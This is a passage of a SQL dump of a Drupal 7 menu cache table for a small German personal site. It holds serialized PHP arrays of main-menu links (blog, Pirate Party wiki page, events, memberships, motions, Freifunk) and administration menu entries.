:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;s:6:\"access\";b:0;}s:5:\"below\";a:0:{}}i:390;a:2:{s:4:\"link\";a:43:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"390\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/6\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:8:\"Anträge\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"390\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;s:6:\"access\";b:0;}s:5:\"below\";a:0:{}}i:391;a:2:{s:4:\"link\";a:43:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"391\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/7\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:8:\"Freifunk\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"6\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"391\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;s:6:\"access\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:4:{i:4;a:1:{i:350;R:94;}i:5;a:1:{i:351;R:140;}i:6;a:1:{i:390;R:186;}i:7;a:1:{i:391;R:232;}}}',0,1444940217,1),('links:main-menu:tree-data:en:ec99d3452fef1ede622e66c68ba908b1dad455aa71f5e68648aeec6488b89c88','a:2:{s:4:\"tree\";a:6:{i:347;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"347\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:32:\"https://www.ollital.de/wordpress\";s:11:\"router_path\";s:0:\"\";s:10:\"link_title\";s:4:\"Blog\";s:7:\"options\";s:49:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:0:\"\";}}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"1\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"1\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"1\";s:2:\"p1\";s:3:\"347\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";N;s:16:\"to_arg_functions\";N;s:15:\"access_callback\";N;s:16:\"access_arguments\";N;s:13:\"page_callback\";N;s:14:\"page_arguments\";N;s:17:\"delivery_callback\";N;s:10:\"tab_parent\";N;s:8:\"tab_root\";N;s:5:\"title\";N;s:14:\"title_callback\";N;s:15:\"title_arguments\";N;s:14:\"theme_callback\";N;s:15:\"theme_arguments\";N;s:4:\"type\";N;s:11:\"description\";N;s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:348;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"348\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:46:\"http://wiki.piratenpartei.de/Benutzer:Darkwing\";s:11:\"router_path\";s:0:\"\";s:10:\"link_title\";s:5:\"Pirat\";s:7:\"options\";s:49:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:0:\"\";}}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"1\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"1\";s:2:\"p1\";s:3:\"348\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";N;s:16:\"to_arg_functions\";N;s:15:\"access_callback\";N;s:16:\"access_arguments\";N;s:13:\"page_callback\";N;s:14:\"page_arguments\";N;s:17:\"delivery_callback\";N;s:10:\"tab_parent\";N;s:8:\"tab_root\";N;s:5:\"title\";N;s:14:\"title_callback\";N;s:15:\"title_arguments\";N;s:14:\"theme_callback\";N;s:15:\"theme_arguments\";N;s:4:\"type\";N;s:11:\"description\";N;s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:350;a:2:{s:4:\"link\";a:43:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"350\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/4\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:7:\"Termine\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"3\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"350\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;s:6:\"access\";b:0;}s:5:\"below\";a:0:{}}i:351;a:2:{s:4:\"link\";a:43:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"351\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/5\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:16:\"Mitgliedschaften\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"4\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"351\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;s:6:\"access\";b:0;}s:5:\"below\";a:0:{}}i:390;a:2:{s:4:\"link\";a:43:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"390\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/6\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:8:\"Anträge\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"390\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;s:6:\"access\";b:0;}s:5:\"below\";a:0:{}}i:391;a:2:{s:4:\"link\";a:43:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"391\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/7\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:8:\"Freifunk\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"6\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"391\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;s:6:\"access\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:4:{i:4;a:1:{i:350;R:94;}i:5;a:1:{i:351;R:140;}i:6;a:1:{i:390;R:186;}i:7;a:1:{i:391;R:232;}}}',0,1445260022,1),('links:management:page:admin/dashboard:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:3:{i:0;i:0;i:1;s:1:\"1\";i:11;s:2:\"11\";}s:12:\"active_trail\";a:3:{i:0;i:0;i:1;s:1:\"1\";i:11;s:2:\"11\";}}',0,1445691048,1),('links:management:page:admin/reports/dblog:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:4:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";i:50;s:2:\"50\";}s:12:\"active_trail\";a:4:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";i:50;s:2:\"50\";}}',0,1444940198,1),('links:management:page:admin/reports/status:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:4:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";i:55;s:2:\"55\";}s:12:\"active_trail\";a:4:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";i:55;s:2:\"55\";}}',0,1444940260,1),('links:management:page:admin/reports/updates/update:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:5:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";i:298;s:3:\"298\";i:305;s:3:\"305\";}s:12:\"active_trail\";a:5:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";i:298;s:3:\"298\";i:305;s:3:\"305\";}}',0,1445543754,1),('links:management:page:admin/reports:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:3:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";}s:12:\"active_trail\";a:3:{i:0;i:0;i:1;s:1:\"1\";i:19;s:2:\"19\";}}',0,1444940256,1),('links:management:page:admin/structure/block/manage/block/1/configure:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:6:{i:0;i:0;i:1;s:1:\"1\";i:21;s:2:\"21\";i:30;s:2:\"30\";i:155;s:3:\"155\";i:175;s:3:\"175\";}s:12:\"active_trail\";a:6:{i:0;i:0;i:1;s:1:\"1\";i:21;s:2:\"21\";i:30;s:2:\"30\";i:155;s:3:\"155\";i:175;s:3:\"175\";}}',0,1447855413,1),('links:management:tree-data:en:0ead175204b0a531a097965e14d0e932a7eaa5bc0aac4de52623f219a2a61688','a:2:{s:4:\"tree\";a:2:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and 